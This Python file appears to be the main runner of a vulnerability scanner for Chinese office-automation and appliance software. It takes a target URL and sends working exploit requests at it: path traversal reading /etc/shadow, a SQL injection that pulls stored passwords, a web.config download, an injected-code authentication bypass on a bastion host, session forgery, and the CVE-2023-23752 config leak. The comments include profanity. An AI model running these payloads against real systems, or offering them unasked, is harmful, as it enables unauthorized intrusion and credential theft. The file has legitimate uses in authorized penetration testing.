/
Run.py
178 lines (159 loc) · 6.36 KB
/
Run.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
from urllib.parse import urlparse, urlunparse
import Bug
from HScan.POC.金蝶OA目录遍历 import jdOA_path
from POC import CVE_2020_27986, PocFun, checkPOC
from POC import CNVD_2021_30167
from POC import CVE_2021_36749
from urllib.parse import urlparse
from POC.用友NC目录遍历漏洞 import yonyou_path
from POC.泛微OAV8SQL注入 import fanwei_OA_sql
from POC.龙璟科技_电池能量BEMS任意下载 import BEMS_download
from POC.齐治堡垒机任意用户登录 import qzbl_anylogin
from POC.金和OA_C6任意下载 import jdOA_anydownload
from POC.通达OA2017前台任意用户登录漏洞 import get2017Session, getV11Session
from main import print_green, print_red
import main
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# par = argparse.ArgumentParser(description='未知版本(内测版)')
# par.add_argument('--url', '-u', help='需要扫描的url', default=False)
# par.add_argument('--timeout', '-t', help='指定超时数值,默认为6', default=6, type=int)
# par.add_argument('--thead', '-n', help='线程数,默认为1(暂不开发)', type=int, default=1)
# par.add_argument('--file', '-f', help='批量url文本', default=False)
# par.add_argument('--scraper', '-s', help='自动化爬取url', action='store_true')
# args = par.parse_args()
#
# '''
# 检测这个傻逼是不是输入空的url
# '''
# if args.url is False and args.file is False:
# hprint(logo=True)
# par.print_help()
# exit()
# def fix_url(url):
# parsed_url = urlparse(url)
# if not parsed_url.scheme:
# parsed_url = parsed_url._replace(scheme='http')
# if not parsed_url.netloc:
# print_red('[!]URL错误!')
#
# return urlunparse(parsed_url)
# url = args.url
# timeout = args.timeout
# thead = args.thead
# file = args.file
# scraper = args.scraper
# 检测到的漏洞数
check_num = 0
def parse_url(url):
try:
parsed_url = urlparse(url)
if parsed_url.scheme and parsed_url.netloc:
return parsed_url.geturl()
else:
print_red("[!]URL格式错误")
return None
except Exception as e:
print_red("[!]解析URL时发生错误")
return None
err = '''
=======================
可能存在误报,请谅解
=======================
'''
def check_POC(in_url, timeout=6):
print_red(err)
turl = parse_url(in_url)
global check_num
if not turl is None:
re = CVE_2021_36749.Apache_Druid_any_path(data=turl, timeout=timeout)
re = CNVD_2021_30167.yonyou_nc(url=turl, timeout=timeout)
re = qzbl_anylogin(url=turl, timeout=timeout)
re = get2017Session(url=turl, timeout=timeout)
re = getV11Session(url=turl, timeout=timeout)
re = jdOA_path(url=turl,timeout=timeout)
re = checkPOC.poc_check('CVE-2023-23752',
turl,
'/api/index.php/v1/config/application?public=true',
expected_keyword='links',
timeout=timeout)
re = checkPOC.poc_check('一米OA 任意文件读取漏洞',
turl,
'/public/getfile.jsp?user=1&prop=activex&filename=../public/getfile&extname=jsp',
expected_keyword='警告非法用户',
timeout=timeout)
re = checkPOC.poc_check('CVE-2020-27986',
turl,
'/api/settings/values',
expected_keyword=['setting', 'key'],
timeout=timeout)
re = checkPOC.poc_check('泛微OAV8SQL注入',
turl,
'/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager',
timeout=timeout)
re = checkPOC.poc_check('用友NC目录遍历',
turl,
'/NCFindWeb?service=IPreAlertConfigService&filename',
timeout=timeout)
re = checkPOC.poc_check('金和OA-C6任意文件下载',
turl,
'/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config',
timeout=timeout)
re = checkPOC.poc_check('齐治堡垒机任意用户登录',
turl,
'/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm',
expected_keyword='nav_sys_message',
timeout=timeout)
re = checkPOC.poc_check('龙璟科技-电池能量BEMS-任意文件下载漏洞',
turl,
'/api/downloads?fileName=../../../../../../../../etc/shadow',
expected_keyword='::',
timeout=timeout)
# def url_check(in_url):
# main.print_yellow('检测到单链接模式')
# if scraper:
# Bug.urlCheck(url=in_url)
# else:
# check_POC(in_url)
#
#
# def file_check(in_file):
# main.print_yellow('检测到批量模式')
# try:
# file = open(in_file, 'r')
# while True:
# out_url = file.readline()
# if out_url == '':
# break
# if scraper:
# Bug.urlCheck(url=out_url)
# else:
# check_POC(out_url)
# except IOError as e:
# main.print_red('读取错误:' + e)
# except Exception as e:
# main.print_red('未知错误:' + str(e))
def main():
print_green('[+]当前模式为OA漏洞扫描')
print_red('退出请输入"退出/exit"')
while True:
url = input('请输入URL: ')
if '退出' == url or 'exit' == url:
break
else:
check_POC(url)
print('=' * 10)
if __name__ == '__main__':
main()
# # 如果file不为空
# if args.file:
# # 批量检测
# args.url = False
# file_check(file)
# if args.url:
# # 单url检测
# if args.url and args.file:
# hprint('不能两个同时检测啊!操你妈')
# exit()
# else:
# url_check(url)